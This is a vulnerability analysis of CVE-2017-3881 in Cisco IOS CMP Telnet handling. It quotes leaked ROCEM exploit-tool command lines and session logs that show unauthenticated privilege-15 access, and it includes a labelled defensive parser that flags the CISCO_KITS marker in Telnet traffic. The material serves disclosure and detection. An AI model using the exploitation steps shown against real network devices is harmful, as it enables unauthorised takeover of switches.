MYHACK58:62201785361

Analysis of CVE-2017-3881 on the Cisco Catalyst 2960 switch (Vulnerability Warning, myhack58.com)

2017-04-18 00:00:00
Anonymous (佚名)
www.myhack58.com

CVSS3: 9.8 High
  Attack Vector: NETWORK; Attack Complexity: LOW; Privileges Required: NONE; User Interaction: NONE; Scope: UNCHANGED; Confidentiality Impact: HIGH; Integrity Impact: HIGH; Availability Impact: HIGH
  Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS2: 10 High
  Access Vector: NETWORK; Access Complexity: LOW; Authentication: NONE; Confidentiality Impact: COMPLETE; Integrity Impact: COMPLETE; Availability Impact: COMPLETE
  Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

EPSS: 0.975 High (Percentile 100.0%)


On March 17, 2017, Cisco announced on its official website that the Cluster Management Protocol (CMP) in Cisco IOS and IOS XE Software contains a remote code execution vulnerability, tracked as CVE-2017-3881.

Cisco discovered the vulnerability while analyzing the "Vault 7" documents leaked from the CIA. An unauthenticated remote attacker can reload the affected device or execute arbitrary code on it. The root cause is twofold: the CMP-specific Telnet options are not restricted to internal, local communication between cluster members but are accepted on any Telnet connection to an affected device, and malformed CMP-specific Telnet options are handled incorrectly. An attacker who opens a Telnet connection to an affected device and sends malformed CMP-specific Telnet options while the connection is being established can use this to execute arbitrary code and take full control of the device, or to force it to reload.

As of this writing, Cisco has not released a fix for the Cluster Management Protocol remote code execution vulnerability CVE-2017-3881.

The Vault 7 documents disclose the test notes for a tool (ROCEM) that exploits this vulnerability. The tool ships its payloads as prebuilt binary blobs rather than source code and is started in either Interactive mode or Set mode. Interactive mode sends the payload over telnet and, within the same telnet connection, immediately hands the attacker a command shell:

Started ROCEM interactive session - successful:
root@debian:/home/user1/ops/adverse/adverse-1r/rocem# ./rocem_c3560-ipbase-mz.122-35.SE5.py -i 192.168.0.254
[+] Validating data/interactive.bin
[+] Validating data/set.bin
[+] Validating data/transfer.bin
[+] Validating data/unset.bin

Image: c3560-ipbase-mz.122-35.SE5
Host: 192.168.0.254
Action: Interactive

Proceed? (y/n)y
Trying 127.0.0.1...
[*] Attempting connection to host 192.168.0.254:23
Connected to 127.0.0.1.
Escape character is '^]'.
[+] Connection established
[*] Starting the interactive session
User Access Verification
Password:
MLS-Sth#
MLS-Sth# show priv
The Current privilege level is 15
MLS-Sth#show users
    Line       User       Host(s)              Idle       Location
*  1 vty 0                idle                 00:00:00 192.168.221.40

  Interface    User               Mode         Idle     Peer Address
MLS-Sth#exit
Connection closed by foreign host.

Set mode modifies the switch's memory so that a later, unauthenticated telnet connection is accepted:

Test set/unset feature of ROCEM
The DUT is configured with the target configuration and network setup
The DUT is accessed by hopping through three flux nodes as per the CONOP
Reloaded the DUT to start with a clean device
From Adverse ICON machine, set ROCEM:
root@debian:/home/user1/ops/adverse/adverse-1r/rocem# ./rocem_c3560-ipbase-mz.122-35.SE5.py -s 192.168.0.254
[+] Validating data/interactive.bin
[+] Validating data/set.bin
[+] Validating data/transfer.bin
[+] Validating data/unset.bin

Image: c3560-ipbase-mz.122-35.SE5
Host: 192.168.0.254
Action: Set

Proceed? (y/n)y
[*] Attempting connection to host 192.168.0.254:23
[+] Connection established
[*] Sending Protocol Step 1
[*] Sending Protocol Step 2
[+] Done
root@debian:/home/user1/ops/adverse/adverse-1r/rocem#
Verified I could telnet and rx priv 15 without creds:
root@debian:/home/user1/ops/adverse/adverse-1r/rocem# telnet 192.168.0.254
Trying 192.168.0.254...
Connected to 192.168.0.254.
Escape character is '^]'.
MLS-Sth#
MLS-Sth#show priv
The Current privilege level is 15
MLS-Sth#

While studying this vulnerability we found one piece of information in the documents that is useful to us: the telnet debug output.

  1. Confirm Xetron EAR 5355 - Debug telnet causes anomalous output
  2. Enabled the debug telnet on DUT
  3. Set ROCEM
  4. Observed the following:
    000467: Jun 3 13:54:09.330: TCP2: Telnet received WILL TTY-SPEED (32) (refused)
    000468: Jun 3 13:54:09.330: TCP2: Telnet sent DONT TTY-SPEED (32)
    000469: Jun 3 13:54:09.330: TCP2: Telnet received WILL LOCAL-FLOW (33) (refused)
    000470: Jun 3 13:54:09.330: TCP2: Telnet sent DONT LOCAL-FLOW (33)
    000471: Jun 3 13:54:09.330: TCP2: Telnet received WILL LINEMODE (34)
    000472: Jun 3 13:54:09.330: TCP2: Telnet sent DONT LINEMODE (34) (unimplemented)
    000473: Jun 3 13:54:09.330: TCP2: Telnet received WILL NEW-ENVIRON (39)
    000474: Jun 3 13:54:09.330: TCP2: Telnet sent DONT NEW-ENVIRON (39) (unimplemented)
    000475: Jun 3 13:54:09.330: TCP2: Telnet received DO STATUS (5)
    000476: Jun 3 13:54:09.330: TCP2: Telnet sent WONT STATUS (5) (unimplemented)
    000477: Jun 3 13:54:09.330: TCP2: Telnet received WILL X-DISPLAY (35) (refused)
    000478: Jun 3 13:54:09.330: TCP2: Telnet sent DONT X-DISPLAY (35)
    000479: Jun 3 13:54:09.330: TCP2: Telnet received DO ECHO (1)
    000480: Jun 3 13:54:09.330: Telnet2: recv SB NAWS 116 29
    000481: Jun 3 13:54:09.623: Telnet2: recv SB 36 92 OS^K’zAuk,Fz90X
    000482: Jun 3 13:54:09.623: Telnet2: recv SB 36 0 ^CCISCO_KITS^Ap

Note the option received in the last line, which carries the string CISCO_KITS. This string turned out to be the important one.
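The negotiation above, as a worked example that is not part of the original article and not code from Cisco or from the leaked tooling: a Python parser that walks a raw Telnet byte stream the way the switch's Telnet server would see it, prints each option negotiation in the style of the `debug telnet` lines quoted above, and flags any subnegotiation of option 36 that carries the CISCO_KITS marker. The sample stream is constructed to mirror the quoted debug lines; the byte layout of the option-36 body (read off the line `recv SB 36 0 ^CCISCO_KITS^Ap`) and the rule that such a subnegotiation on an ordinary Telnet session is suspect are assumptions made for this example, not Cisco documentation.

```python
"""Decode Telnet option negotiation and flag CMP-style subnegotiations.

Added example, not from the article or from Cisco. Parses IAC command
sequences (RFC 854), renders them like `debug telnet`, and reports any
option-36 subnegotiation containing the CISCO_KITS marker string.
"""
import struct
from dataclasses import dataclass
from typing import List, Tuple

# Telnet command bytes (RFC 854)
IAC, DONT, DO, WONT, WILL, SB, SE = 255, 254, 253, 252, 251, 250, 240
VERBS = {WILL: "WILL", WONT: "WONT", DO: "DO", DONT: "DONT"}

# Option numbers that appear in the debug output quoted in the article.
OPTION_NAMES = {
    1: "ECHO", 5: "STATUS", 31: "NAWS", 32: "TTY-SPEED", 33: "LOCAL-FLOW",
    34: "LINEMODE", 35: "X-DISPLAY", 36: "ENVIRON", 39: "NEW-ENVIRON",
}

# Detection rule for this example (an assumption, not a Cisco rule): the
# debug output shows CISCO_KITS inside a subnegotiation of option 36, so any
# such subnegotiation on a Telnet session is treated as CMP-style traffic.
CMP_OPTION = 36
CMP_MARKER = b"CISCO_KITS"


@dataclass
class Negotiation:
    verb: str               # WILL / WONT / DO / DONT / SB
    option: int
    payload: bytes = b""    # subnegotiation body (SB only), IAC-unescaped

    def option_name(self) -> str:
        return OPTION_NAMES.get(self.option, f"OPT-{self.option}")


def parse_telnet(stream: bytes) -> Tuple[bytes, List[Negotiation]]:
    """Split a raw Telnet stream into plain data bytes and its negotiations.

    Handles IAC IAC escaping both in data and inside SB...SE bodies and
    raises ValueError on a truncated or unterminated command sequence.
    """
    data = bytearray()
    negs: List[Negotiation] = []
    i, n = 0, len(stream)
    while i < n:
        if stream[i] != IAC:
            data.append(stream[i])
            i += 1
            continue
        if i + 1 >= n:
            raise ValueError("truncated IAC at end of stream")
        cmd = stream[i + 1]
        if cmd == IAC:                      # escaped 0xff data byte
            data.append(IAC)
            i += 2
        elif cmd in VERBS:                  # 3-byte option negotiation
            if i + 2 >= n:
                raise ValueError("truncated option negotiation")
            negs.append(Negotiation(VERBS[cmd], stream[i + 2]))
            i += 3
        elif cmd == SB:                     # IAC SB <opt> <body> IAC SE
            if i + 2 >= n:
                raise ValueError("truncated subnegotiation header")
            opt, body, j = stream[i + 2], bytearray(), i + 3
            while True:
                if j + 1 >= n:
                    raise ValueError("unterminated subnegotiation")
                if stream[j] == IAC:
                    if stream[j + 1] == SE:
                        break
                    if stream[j + 1] == IAC:
                        body.append(IAC)
                        j += 2
                        continue
                    raise ValueError("unexpected command inside subnegotiation")
                body.append(stream[j])
                j += 1
            negs.append(Negotiation("SB", opt, bytes(body)))
            i = j + 2
        else:                               # NOP, GA, etc.: 2-byte commands
            i += 2
    return bytes(data), negs


def caret(data: bytes) -> str:
    """Render bytes as the debug output does: control bytes as ^X, ASCII as-is."""
    out = []
    for b in data:
        if 32 <= b < 127:
            out.append(chr(b))
        elif b < 32:
            out.append("^" + chr(b + 64))
        else:
            out.append(f"\\x{b:02x}")
    return "".join(out)


def describe(neg: Negotiation) -> str:
    """Format one negotiation in the style of the `debug telnet` lines above."""
    if neg.verb != "SB":
        return f"Telnet received {neg.verb} {neg.option_name()} ({neg.option})"
    if neg.option == 31 and len(neg.payload) == 4:      # NAWS: width, height
        width, height = struct.unpack("!HH", neg.payload)
        return f"recv SB NAWS {width} {height}"
    if not neg.payload:
        return f"recv SB {neg.option}"
    return f"recv SB {neg.option} {neg.payload[0]} {caret(neg.payload[1:])}"


def is_cmp_subnegotiation(neg: Negotiation) -> bool:
    return neg.verb == "SB" and neg.option == CMP_OPTION and CMP_MARKER in neg.payload


def find_cmp_options(stream: bytes) -> List[Negotiation]:
    """Return every option-36 subnegotiation carrying CISCO_KITS in the stream."""
    _, negs = parse_telnet(stream)
    return [neg for neg in negs if is_cmp_subnegotiation(neg)]


# Constructed sample (not a real capture): a client negotiation mirroring the
# quoted debug lines, one NAWS subnegotiation, one option-36 body with the
# CISCO_KITS marker, then ordinary command data. The 0x00 0x03 ... 0x01 'p'
# layout is inferred from the debug line and is an assumption.
SAMPLE_STREAM = (
    bytes([IAC, WILL, 32, IAC, WILL, 33, IAC, WILL, 34, IAC, WILL, 39])
    + bytes([IAC, DO, 5, IAC, WILL, 35, IAC, DO, 1])
    + bytes([IAC, SB, 31, 0, 116, 0, 29, IAC, SE])                    # NAWS 116x29
    + bytes([IAC, SB, 36, 0, 3]) + CMP_MARKER + bytes([1]) + b"p" + bytes([IAC, SE])
    + b"show priv\r\n"
)

if __name__ == "__main__":
    _, negotiations = parse_telnet(SAMPLE_STREAM)
    for neg in negotiations:
        print(describe(neg))
    for hit in find_cmp_options(SAMPLE_STREAM):
        print("ALERT: CMP-style option 36 subnegotiation on a Telnet session:", hit.payload)
```

Fed the bytes of a reassembled port 23 session, the same functions give a passive detection hook: CMP option negotiation is only expected between members of a switch cluster, so seeing it on a vty session from an arbitrary address is worth an alert. The parser cannot by itself distinguish a benign cluster exchange from an exploit attempt, and the rule should be tuned on traffic from the cluster's own management network before being used in production.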

According to the advisory Cisco has published so far, a total of 318 products are affected by this vulnerability; see the Appendix for the detailed product list.

At present only the following two categories of devices are not affected:

  1. Devices running Cisco IOS Software that are not on the list of affected devices.

  2. Devices running Cisco IOS XE Software that do not include the CMP protocol subsystem.

Detection method for CVE-2017-3881

